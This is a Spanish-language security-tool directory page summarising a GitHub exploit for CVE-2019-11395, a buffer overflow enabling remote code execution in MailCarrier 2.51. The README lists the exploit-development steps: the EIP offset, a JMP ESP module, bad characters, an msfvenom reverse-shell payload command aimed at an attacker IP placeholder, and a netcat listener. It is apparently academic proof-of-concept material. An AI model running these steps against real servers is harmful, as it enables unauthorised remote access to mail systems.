Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-11395 — Un exploit para la vulnerabilidad CVE-2019-11395 en la aplicación de correo MailCarrier 2.51, que permite la ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/caioprince/cve-2019-11395
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodePruebas de PenetraciónExplotación de Binarios
GitHubcaioprince/cve-2019-11395

CVE-2019-11395

Un exploit para la vulnerabilidad CVE-2019-11395 en la aplicación de correo MailCarrier 2.51, que permite la ejecución remota de código.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit CVE-2019-11395 🛡️

Acerca de CVE-2019-11395 🕵️

La vulnerabilidad CVE-2019-11395 describe una vulnerabilidad de desbordamiento de búfer en la aplicación de correo electrónico MailCarrier 2.51, que permite la ejecución remota de código. La vulnerabilidad ocurre en los procesos SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP o POP3 RETR.

Durante el estudio académico, se centró la atención en los procesos POP3 para crear una Prueba de Concepto (PoC). Se identificó que el envío de 6000 bytes a la aplicación provoca que deje de funcionar, revelando así la vulnerabilidad de desbordamiento de búfer.

Pasos de explotación 🔍

  1. Se utilizó msf-pattern_create -l 6000 para identificar con precisión el EIP.
  2. Se identificó el desplazamiento del EIP con msf-pattern_offset -q 6E47386E -l 6000, obteniendo un desplazamiento EIP de 5095.
  3. Se identificó expsrv.dll con ASLR deshabilitado, adecuado para un JMP ESP.
  4. Se identificaron los caracteres malos \x00\x0a\x0d durante las pruebas de caracteres inválidos.
  5. Se generó el payload con msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
  6. Se ajustó el código CVE-2019-11395.py para alojar el payload.
  7. Se abrió una conexión con nc -lnvp 4444 y se ejecutó el exploit (CVE-2019-11395.py) para obtener acceso al entorno y validar el CVE descrito.

Uso 🚀

Sigue estos pasos para utilizar el exploit:

  1. Genera el payload usando msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
  2. Copia la salida del comando msfvenom.
  3. Ajusta el código CVE-2019-11395.py para reemplazar la variable shellcode con la salida obtenida del comando msfvenom.
  4. Ejecuta el exploit (CVE-2019-11395.py) para obtener acceso al entorno y validar el CVE descrito.

Entorno comprometido 📸

PoC CVE-2019-11395

🔗 Conéctate conmigo

Visita mi perfil en LinkedIn

Descargar herramienta